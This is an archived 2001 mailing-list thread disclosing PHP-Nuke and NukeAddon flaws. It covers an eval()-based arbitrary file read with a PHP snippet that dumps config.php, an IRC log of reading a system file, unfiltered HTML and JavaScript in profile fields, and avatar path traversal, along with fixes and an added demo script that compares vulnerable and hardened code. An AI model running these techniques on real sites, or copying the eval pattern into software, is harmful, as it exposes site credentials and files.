Vulnerability Development mailing list archives
Re: SERIOUS BUG IN PHPNUKE
From: supergate () twlc net
Date: Fri, 27 Jul 2001 23:33:32 +0200
I don't find it a serious bug... they can just ruin their details page... so who cares... However, if you want a serious bug in PHP-Nuke, well, there is one that allows reading any file on the system. Look at:
http://www.twlc.net/article.php?sid=318

Mauro
admin of twlc dot net

bug in nuke addon@#! DANGEROUS++!!!
Posted on Friday, July 13 @ 19:53:31 CDT
topic: advisories

Evening everyone.. Sorry to tell you: PHP-Nuke addon is BUGGY. It's got a *HUGE* bug that allows reading every file on the system. Let me explain the bug...

To do active forums and shit like that, the author had to put:

    echo "<tr valign=\"top\"><td bgcolor=\"#ffffff\">\n";
    if (file_exists($content)) {
        $fp = fopen($content, "r");
        $content = fread($fp, filesize($content));
        fclose($fp);
        $content = "?>$content<?";
        echo eval($content);
    } else {
        echo $content;
    }
    echo "</td></tr></table>\n";

replacing

    ."<tr valign=\"top\"><td bgcolor=\"#ffffff\">\n"
    ."$content\n"
    ."</td></tr></table>\n"

ON EACH THEME file.

So what does this code do? It checks the content of the block and, if this is a file, it 'executes' it... Now I was like 'and if I put something like this':

    <?php
    $db = "config.php";
    $fdb = @file($db);
    $ldb = count($fdb) - 1;   // index of the last line; the posted version started at count() and read one past the end
    while ($ldb >= 0) {
        echo $fdb[$ldb];
        $ldb--;
    }
    ?>

(sorry for the code, but I am not a PHP guru :P)

and name it exploit.php and put it in the main directory? It simply allowed me to read config.php. But a friend of mine (shockzor, THANK YOU BRO) told me "who could put a file like that on your webserver?" (I didn't test uploading it to my anonymous FTP, but I think it could work :)) But that's just one possibility that this routine gives you, 'cause I went ahead doing these tests and I found that this SIMPLY ALLOWS ANY FILE READING ON THE SYSTEM. LOOK:

    (sg|code) u got autoexec.bat under c: ?
    (shockzor) no
    (shockzor) autoexec.nt
    (sg|code) good
    (sg|code) Menu for shit <sg|code>
    (sg|code) lh %SystemRoot%\system32\mscdexnt.exe
              lh %SystemRoot%\system32\redir
              lh %SystemRoot%\system32\dosx
    (sg|code) now
    (sg|code) since i am
    (sg|code) 31337
    (sg|code) WHAT?
    (sg|code) EHEH
    (shockzor) i dont think you can get out of the www root
    (sg|code) u think wrong
    (sg|code) cus i just did

Well, you got two fixes:

1) bring back your theme files to:

    ."<tr valign=\"top\"><td bgcolor=\"#ffffff\">\n"
    ."$content\n"
    ."</td></tr></table>\n"

2) get user.php, go to the end of the file where there is:

    switch($op) {

look down until you find

    case "edithome":
        edithome();
        break;

    case "savehome":
        savehome($uid, $uname, $theme, $storynum, $ublockon, $ublock);
        break;

and remove this shit so users can't create their "home menu".

Thanks for the attention. BTW I would like to thank shockzor, who helped me make the tests! Thanks bro..! :D Thanks also go out to all in #twlc on Undernet. Peace out. (Thanks go out also to the authors of PHP-Nuke and PHP-Nuke addon; I run them and I like them a lot! Keep up the good work.)

Mauro aka supergate
root () twlc net
http://www.twlc.net

The following text has been posted to:
http://www.twlc.net
http://www.phpnuke.org
http://www.nukeaddon.com

----- Original Message -----
From: "MegaHz" <costcon () cytanet com cy>
To: <VULN-DEV () securityfocus com>; <INCIDENTS () securityfocus com>; <bugtraq () securityfocus com>
Cc: <mc2 () securitywire com>
Sent: Friday, July 27, 2001 4:41 PM
Subject: SERIOUS BUG IN PHPNUKE
Yes, phpnuke.org was contacted....

First take a look at:
http://phpnuke.org/user.php?op=userinfo&uname=MegaHz

Then, read this.................

PHPnuke Bugs.

After testing just a few scripts on phpnuke I have noticed the following:

Some fields in the registration form allow code and fail to filter out the tags. e.g. Interests: src=http://www.anything.com/defaced.gif>

Also, when faking a form and posting from a local file (user.php.html) after editing a few fields like the avatar picture, for example, it is possible to escape certain dirs with ../../../../dir/pic.gif in the options field.

(-- This is a local html file and set to post to user.php on the target server --)
(no this is not a tag :P)
001.gif
002.gif

This tells user.php to save the avatar path as http://www.target.com/../../../dir_on_server/anyfile.ext and loads the file when the user info of the attacker is viewed. As we know, webbugs (invisible or visible pics) can be used for tracing.

The preview of the Registration Form allows Javascript in the body (not the user.php), but it does not allow ' or ". BUT you can use / instead of ', so this helps to fill in variables in javascript. This can damage the site and make it look ugly.

I couldn't be bothered to look at the rest of phpnuke...

Tested on phpnuke v5.0
Firstly discovered by: dinopio

=================================================
Andreas Constantinides (MegaHz)
Owner - Admin of cHp - http://www.cyhackportal.com
megahz () cyhackportal com
ICQ#: 30136845
=================================================
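The two messages above describe the same root cause from two sides: user.php lets a registered user save arbitrary text into their profile (the "home menu" block, the avatar field, the Interests field), and the theme code then treats that text as a filename to eval() or as raw HTML. The script below is an added example written for this archive page; it is not code from either poster or from PHP-Nuke / NukeAddon. It isolates the theme snippet supergate quoted so it runs from the command line, places a hardened block renderer beside it, and adds the avatar check that MegaHz's ../../../../dir/pic.gif forgery calls for. The function names (renderBlockVulnerable, renderBlockFixed, pickAvatar), the variable $ublock, the use of htmlspecialchars, and the temp file standing in for a file outside the web root are all this example's own assumptions.

```php
<?php
// Added example, not code from the original posts or from PHP-Nuke / NukeAddon.
// Function names, the $ublock variable and the stand-in file are assumptions.

// 1. The theme code quoted by supergate. If the block text names an existing file,
//    the file is read and passed through eval(); nothing ties the path to the web root.
function renderBlockVulnerable(string $content): string
{
    ob_start();
    echo "<tr valign=\"top\"><td bgcolor=\"#ffffff\">\n";
    if (file_exists($content)) {
        $fp = fopen($content, "r");
        $content = fread($fp, filesize($content));
        fclose($fp);
        // Leaving PHP mode first makes eval() print a non-PHP file verbatim
        // (and run any <?php ... ?> blocks a PHP file contains).
        $content = "?>$content<?";
        echo eval($content);
    } else {
        echo $content;
    }
    echo "</td></tr></table>\n";
    return ob_get_clean();
}

// 2. Hardened renderer: the block text is data, never a path. Dropping the
//    file_exists() branch is the fix given in the post; escaping the text is an
//    addition here, since MegaHz's message shows the same fields accept raw tags.
function renderBlockFixed(string $content): string
{
    return "<tr valign=\"top\"><td bgcolor=\"#ffffff\">\n"
        . htmlspecialchars($content, ENT_QUOTES, 'UTF-8') . "\n"
        . "</td></tr></table>\n";
}

// 3. Avatar selection. A forged local form can submit any string for the avatar
//    field; accepting only exact names from the server's own list (basename must
//    equal the submitted value) rejects "../../../../dir/pic.gif" and "dir/002.gif".
function pickAvatar(string $submitted, array $allowed, string $fallback = 'blank.gif'): string
{
    $name = basename($submitted);
    return (in_array($name, $allowed, true) && $name === $submitted) ? $name : $fallback;
}

// Constructed stand-in for a file outside the web root (the role autoexec.nt plays
// in the IRC log above), written to the system temp directory.
$outside = tempnam(sys_get_temp_dir(), 'nukedemo');
file_put_contents($outside, "lh %SystemRoot%\\system32\\mscdexnt.exe\n");

$ublock = $outside;   // what the attacker saves as their "home menu" block text
$vuln   = renderBlockVulnerable($ublock);
$fixed  = renderBlockFixed($ublock);
printf("vulnerable renderer leaked the file: %s\n", strpos($vuln, 'mscdexnt') !== false ? 'yes' : 'no');
printf("fixed renderer leaked the file:      %s\n", strpos($fixed, 'mscdexnt') !== false ? 'yes' : 'no');
printf("fixed renderer neutralised a tag:    %s\n",
    strpos(renderBlockFixed('<img src=x>'), '&lt;img') !== false ? 'yes' : 'no');
unlink($outside);

// Avatar list constructed from the two option names visible in MegaHz's post.
$avatars = ['001.gif', '002.gif'];
foreach (['002.gif', '../../../../dir/pic.gif', 'dir/002.gif'] as $try) {
    printf("avatar %-26s -> %s\n", $try, pickAvatar($try, $avatars));
}
```

Run it with `php` on the command line: the vulnerable renderer prints the temp file's contents into the HTML, the fixed one prints only the path string, and only the exact option name 002.gif survives pickAvatar. The point of comparing basename() against the submitted value, rather than just stripping "../", is that any form of path component in the avatar field is rejected outright instead of being normalised.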
Current thread:
- SERIOUS BUG IN PHPNUKE MegaHz (Jul 27)
- Re: SERIOUS BUG IN PHPNUKE supergate (Jul 28)
- Re: SERIOUS BUG IN PHPNUKE Josué (Jul 30)
- Re: SERIOUS BUG IN PHPNUKE MegaHz (Jul 30)